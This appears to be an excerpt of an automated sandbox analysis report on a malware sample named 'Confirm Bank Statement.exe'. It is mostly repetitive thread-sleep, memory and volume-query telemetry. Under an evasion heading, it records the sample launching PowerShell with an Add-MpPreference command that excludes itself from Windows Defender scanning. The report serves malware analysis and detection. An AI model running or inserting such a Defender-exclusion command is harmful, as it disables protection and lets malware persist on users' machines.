                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: B190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599753Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599296Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598749Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598311Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597872Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596671Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596449Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596124Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595796Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6694Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2101Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeWindow / User API: threadDelayed 8582Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeWindow / User API: threadDelayed 1278Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 5860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7912Thread sleep count: 8582 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7912Thread sleep count: 1278 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599753s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599077s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598311s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597872s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596449s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599753Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599296Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598749Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598311Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597872Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596671Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596449Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596124Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595796Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594593Jump to behavior
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3719715761.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5C168 LdrInitializeThunk,LdrInitializeThunk,4_2_00B5C168
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Users\user\Desktop\Confirm Bank Statement.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
